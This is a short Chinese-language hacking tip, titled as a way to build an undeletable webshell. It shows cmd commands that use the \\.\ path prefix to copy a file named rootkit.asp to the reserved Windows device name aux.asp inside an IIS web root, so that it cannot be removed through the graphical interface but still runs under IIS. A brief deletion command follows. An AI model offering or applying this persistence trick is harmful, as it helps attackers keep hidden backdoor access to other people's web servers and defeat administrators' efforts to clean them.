打造永不被删除的webshell
Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现:
D:\wwwroot>copy rootkit.asp \\.\D:\\wwwroot\aux.asp
已复制 1 个文件。
D:\AspWebServer\wwwroot>dir
驱动器 D 中的卷没有标签。
卷的序列号是 47747.net6-1D29
D:\AspWebServer\wwwroot 的目录
2010-04-25 14:41 <DIR> .
2010-04-25 14:41 <DIR> ..
2010-03-08 22:50 42,756 aux.asp
2005-05-02 03:02 9,083 index.asp
2010-03-08 22:50 42,756 rootkit.asp
3 个文件 94,595 字节
2 个目录 3,307,204,608 可用字节
这类文件无法在图形界面删除,
只能在命令行下删除:
D:\wwwroot>del \\.\D:\wwwroot\aux.asp
D:\wwwroot>
然而在IIS中,这种文件又是可以解析成功的。